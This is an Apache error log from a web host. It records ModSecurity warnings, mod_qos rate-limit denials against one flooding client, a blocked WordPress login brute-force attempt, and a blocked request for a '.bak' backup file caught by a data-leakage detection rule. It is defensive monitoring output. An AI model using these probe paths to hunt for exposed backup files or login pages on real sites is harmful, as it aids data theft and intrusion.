[Tue May 26 19:54:12.318444 2026] [security2:error] [pid 86490:tid 86624] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtClZMwN0DpLVWo6K25AAAAIk"]
[Tue May 26 19:54:12.318502 2026] [security2:error] [pid 93576:tid 93757] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCmDRMqfxdEDkoszN_gAAAC0"]
[Tue May 26 19:54:12.323417 2026] [security2:error] [pid 93576:tid 93806] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCmDRMqfxdEDkoszN7QAAAF4"]
[Tue May 26 19:54:12.326889 2026] [security2:error] [pid 93868:tid 94382] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCkqK9k_ZUB2Vp25G_wAAAgs"]
[Tue May 26 19:54:12.328699 2026] [security2:error] [pid 93576:tid 93776] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCmDRMqfxdEDkoszOAAAAAEA"]
[Tue May 26 19:54:12.329150 2026] [security2:error] [pid 93868:tid 94290] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCkqK9k_ZUB2Vp25G-wAAAa8"]
[Tue May 26 19:54:12.339662 2026] [security2:error] [pid 86490:tid 86672] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtClZMwN0DpLVWo6K28QAAALk"]
[Tue May 26 19:54:12.354524 2026] [security2:error] [pid 93576:tid 93746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtC2DRMqfxdEDkoszOFgAAACI"]
[Tue May 26 19:54:12.356669 2026] [security2:error] [pid 93868:tid 94321] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCkqK9k_ZUB2Vp25G_QAAAc4"]
[Tue May 26 19:54:12.374971 2026] [security2:error] [pid 93576:tid 93827] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCmDRMqfxdEDkoszN9gAAAHM"]
[Tue May 26 19:54:12.376854 2026] [security2:error] [pid 93576:tid 93794] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCmDRMqfxdEDkoszOAgAAAFI"]
[Tue May 26 19:54:12.377037 2026] [security2:error] [pid 93576:tid 93771] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtC2DRMqfxdEDkoszOGAAAADs"]
[Tue May 26 19:54:12.378582 2026] [security2:error] [pid 93576:tid 93774] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtC2DRMqfxdEDkoszOFQAAAD4"]
[Tue May 26 19:54:12.389757 2026] [security2:error] [pid 93576:tid 93716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtC2DRMqfxdEDkoszOIQAAAAQ"]
[Tue May 26 19:54:12.405460 2026] [security2:error] [pid 93576:tid 93718] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtC2DRMqfxdEDkoszOKAAAAAY"]
[Tue May 26 19:54:12.415494 2026] [security2:error] [pid 93868:tid 94360] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtC0qK9k_ZUB2Vp25HCwAAAfU"]
[Tue May 26 19:54:12.432719 2026] [security2:error] [pid 93868:tid 94313] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtC0qK9k_ZUB2Vp25HCgAAAcY"]
[Tue May 26 19:54:12.434957 2026] [security2:error] [pid 93576:tid 93773] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtC2DRMqfxdEDkoszOIwAAAD0"]
[Tue May 26 19:54:12.437955 2026] [security2:error] [pid 93576:tid 93737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtC2DRMqfxdEDkoszOLwAAABk"]
[Tue May 26 19:54:12.442116 2026] [security2:error] [pid 93576:tid 93722] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtC2DRMqfxdEDkoszOKwAAAAo"]
[Tue May 26 19:54:12.448638 2026] [security2:error] [pid 93868:tid 94260] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtC0qK9k_ZUB2Vp25HEAAAAZE"]
[Tue May 26 19:54:12.461034 2026] [security2:error] [pid 93576:tid 93824] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtC2DRMqfxdEDkoszOIAAAAHA"]
[Tue May 26 19:54:12.465881 2026] [security2:error] [pid 93576:tid 93816] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtC2DRMqfxdEDkoszOJgAAAGg"]
[Tue May 26 19:54:12.479917 2026] [security2:error] [pid 93576:tid 93606] [remote 162.214.184.71:45738] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.184.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWtDGDRMqfxdEDkoszOPQAAYhs"]
[Tue May 26 19:54:12.556751 2026] [qos:error] [pid 93868:tid 94347] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtDEqK9k_ZUB2Vp25HQQAAAeg
[Tue May 26 19:54:12.567542 2026] [qos:error] [pid 86490:tid 86640] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3pAAAAJk
[Tue May 26 19:54:12.568405 2026] [qos:error] [pid 93576:tid 93731] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDGDRMqfxdEDkoszOagAAABM
[Tue May 26 19:54:12.589023 2026] [qos:error] [pid 86490:tid 86624] [client 45.148.10.120:34834] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3qwAAAIk
[Tue May 26 19:54:12.589718 2026] [qos:error] [pid 86490:tid 86664] [client 45.148.10.120:34796] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3rAAAALE
[Tue May 26 19:54:12.590280 2026] [qos:error] [pid 86490:tid 86746] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3rQAAAQM
[Tue May 26 19:54:12.593437 2026] [qos:error] [pid 86490:tid 86661] [client 45.148.10.120:34904] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3rgAAAK4
[Tue May 26 19:54:12.600552 2026] [qos:error] [pid 86490:tid 86732] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3rwAAAPU
[Tue May 26 19:54:12.610583 2026] [security2:error] [pid 93576:tid 93799] [client 113.176.126.208:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtDGDRMqfxdEDkoszOOwAAAFc"]
[Tue May 26 19:54:12.610942 2026] [qos:error] [pid 86490:tid 86631] [client 45.148.10.120:35122] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3sQAAAJA
[Tue May 26 19:54:12.615188 2026] [qos:error] [pid 86490:tid 86728] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3sgAAAPE
[Tue May 26 19:54:12.705650 2026] [qos:error] [pid 93576:tid 93806] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDGDRMqfxdEDkoszObQAAAF4
[Tue May 26 19:54:12.718350 2026] [qos:error] [pid 93576:tid 93736] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDGDRMqfxdEDkoszObgAAABg
[Tue May 26 19:54:12.721824 2026] [qos:error] [pid 86490:tid 86672] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3swAAALk
[Tue May 26 19:54:12.741220 2026] [qos:error] [pid 86490:tid 86644] [client 45.148.10.120:34834] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3tAAAAJ0
[Tue May 26 19:54:12.742395 2026] [qos:error] [pid 86490:tid 86721] [client 45.148.10.120:34796] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3tQAAAOo
[Tue May 26 19:54:12.743001 2026] [qos:error] [pid 86490:tid 86621] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3tgAAAIY
[Tue May 26 19:54:12.746053 2026] [qos:error] [pid 86490:tid 86714] [client 45.148.10.120:34904] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3twAAAOM
[Tue May 26 19:54:12.753459 2026] [qos:error] [pid 86490:tid 86629] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3uAAAAI4
[Tue May 26 19:54:12.760455 2026] [qos:error] [pid 86490:tid 86684] [client 45.148.10.120:35122] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3uQAAAMU
[Tue May 26 19:54:12.763873 2026] [qos:error] [pid 86490:tid 86674] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3ugAAALs
[Tue May 26 19:54:12.854020 2026] [qos:error] [pid 93576:tid 93818] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDGDRMqfxdEDkoszObwAAAGo
[Tue May 26 19:54:12.868793 2026] [qos:error] [pid 93576:tid 93801] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDGDRMqfxdEDkoszOcQAAAFk
[Tue May 26 19:54:12.876115 2026] [qos:error] [pid 86490:tid 86723] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3vwAAAOw
[Tue May 26 19:54:12.892699 2026] [qos:error] [pid 86490:tid 86634] [client 45.148.10.120:34796] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3wAAAAJM
[Tue May 26 19:54:12.893067 2026] [qos:error] [pid 86490:tid 86717] [client 45.148.10.120:34834] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3wQAAAOY
[Tue May 26 19:54:12.896996 2026] [qos:error] [pid 86490:tid 86738] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3wgAAAPs
[Tue May 26 19:54:12.898503 2026] [qos:error] [pid 86490:tid 86680] [client 45.148.10.120:34904] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3wwAAAME
[Tue May 26 19:54:12.904792 2026] [qos:error] [pid 86490:tid 86628] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3xAAAAI0
[Tue May 26 19:54:12.910377 2026] [qos:error] [pid 86490:tid 86632] [client 45.148.10.120:35122] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3xQAAAJE
[Tue May 26 19:54:12.913037 2026] [qos:error] [pid 86490:tid 86662] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDFZMwN0DpLVWo6K3xgAAAK8
[Tue May 26 19:54:12.933452 2026] [security2:error] [pid 86490:tid 86699] [client 185.177.72.53:34666] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/static/log.bak"] [unique_id "ahWtDFZMwN0DpLVWo6K3xwAAANQ"]
[Tue May 26 19:54:13.003514 2026] [qos:error] [pid 93576:tid 93761] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDWDRMqfxdEDkoszOcwAAADE
[Tue May 26 19:54:13.019242 2026] [qos:error] [pid 93576:tid 93836] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDWDRMqfxdEDkoszOdAAAAHw
[Tue May 26 19:54:13.030920 2026] [qos:error] [pid 86490:tid 86704] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDVZMwN0DpLVWo6K3yAAAANk
[Tue May 26 19:54:13.043954 2026] [qos:error] [pid 86490:tid 86658] [client 45.148.10.120:34796] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDVZMwN0DpLVWo6K3yQAAAKs
[Tue May 26 19:54:13.050559 2026] [qos:error] [pid 86490:tid 86700] [client 45.148.10.120:34904] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDVZMwN0DpLVWo6K3ygAAANU
[Tue May 26 19:54:13.056455 2026] [security2:error] [pid 93868:tid 94275] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtDEqK9k_ZUB2Vp25HRAAAAaA"]
[Tue May 26 19:54:13.061369 2026] [qos:error] [pid 86490:tid 86650] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDVZMwN0DpLVWo6K3ywAAAKM
[Tue May 26 19:54:13.061416 2026] [qos:error] [pid 86490:tid 86729] [client 45.148.10.120:34834] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtDVZMwN0DpLVWo6K3zAAAAPI
[Tue May 26 19:54:13.061495 2026] [qos:error] [pid 86490:tid 86703] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtDVZMwN0DpLVWo6K3zQAAANg
[Tue May 26 19:54:13.062220 2026] [qos:error] [pid 86490:tid 86650] [client 45.148.10.120:35122] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDVZMwN0DpLVWo6K3zgAAAKM
[Tue May 26 19:54:13.063424 2026] [qos:error] [pid 86490:tid 86670] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDVZMwN0DpLVWo6K3zwAAALc
[Tue May 26 19:54:13.185162 2026] [qos:error] [pid 86490:tid 86624] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDVZMwN0DpLVWo6K30wAAAIk
[Tue May 26 19:54:13.188968 2026] [qos:error] [pid 93576:tid 93746] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDWDRMqfxdEDkoszOdQAAACI
[Tue May 26 19:54:13.189551 2026] [qos:error] [pid 93576:tid 93808] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDWDRMqfxdEDkoszOdgAAAGA
[Tue May 26 19:54:13.194315 2026] [qos:error] [pid 86490:tid 86664] [client 45.148.10.120:34796] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDVZMwN0DpLVWo6K31AAAALE
[Tue May 26 19:54:13.203472 2026] [qos:error] [pid 86490:tid 86746] [client 45.148.10.120:34904] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDVZMwN0DpLVWo6K31QAAAQM
[Tue May 26 19:54:13.208486 2026] [qos:error] [pid 86490:tid 86661] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDVZMwN0DpLVWo6K31gAAAK4
[Tue May 26 19:54:13.211980 2026] [qos:error] [pid 86490:tid 86732] [client 45.148.10.120:35122] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDVZMwN0DpLVWo6K31wAAAPU
[Tue May 26 19:54:13.213140 2026] [qos:error] [pid 86490:tid 86707] [client 45.148.10.120:34834] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDVZMwN0DpLVWo6K32AAAANw
[Tue May 26 19:54:13.216539 2026] [qos:error] [pid 86490:tid 86642] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDVZMwN0DpLVWo6K32QAAAJs
[Tue May 26 19:54:13.238822 2026] [qos:error] [pid 86490:tid 86676] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDVZMwN0DpLVWo6K32gAAAL0
[Tue May 26 19:54:13.276661 2026] [security2:error] [pid 93576:tid 93749] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtC2DRMqfxdEDkoszOKgAAACU"]
[Tue May 26 19:54:13.280965 2026] [security2:error] [pid 93576:tid 93800] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtC2DRMqfxdEDkoszOKQAAAFg"]
[Tue May 26 19:54:13.299189 2026] [security2:error] [pid 93576:tid 93777] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtC2DRMqfxdEDkoszOLQAAAEE"]
[Tue May 26 19:54:13.301574 2026] [security2:error] [pid 93868:tid 94336] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtC0qK9k_ZUB2Vp25HDQAAAd0"]
[Tue May 26 19:54:13.301887 2026] [security2:error] [pid 93868:tid 94346] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtC0qK9k_ZUB2Vp25HFAAAAec"]
[Tue May 26 19:54:13.303147 2026] [security2:error] [pid 93576:tid 93720] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtC2DRMqfxdEDkoszOMgAAAAg"]
[Tue May 26 19:54:13.309294 2026] [security2:error] [pid 93576:tid 93713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtC2DRMqfxdEDkoszOGQAAAAE"]
[Tue May 26 19:54:13.313923 2026] [security2:error] [pid 93868:tid 94383] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtC0qK9k_ZUB2Vp25HGQAAAgw"]
[Tue May 26 19:54:13.321874 2026] [security2:error] [pid 86490:tid 86695] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtC1ZMwN0DpLVWo6K3JQAAANA"]
[Tue May 26 19:54:13.322883 2026] [security2:error] [pid 86490:tid 86671] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtC1ZMwN0DpLVWo6K3QgAAALg"]
[Tue May 26 19:54:13.327509 2026] [security2:error] [pid 93868:tid 94303] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtC0qK9k_ZUB2Vp25HDAAAAbw"]
[Tue May 26 19:54:13.333222 2026] [security2:error] [pid 86490:tid 86637] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtC1ZMwN0DpLVWo6K3JgAAAJY"]
[Tue May 26 19:54:13.335142 2026] [security2:error] [pid 93576:tid 93819] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtC2DRMqfxdEDkoszOMAAAAGs"]
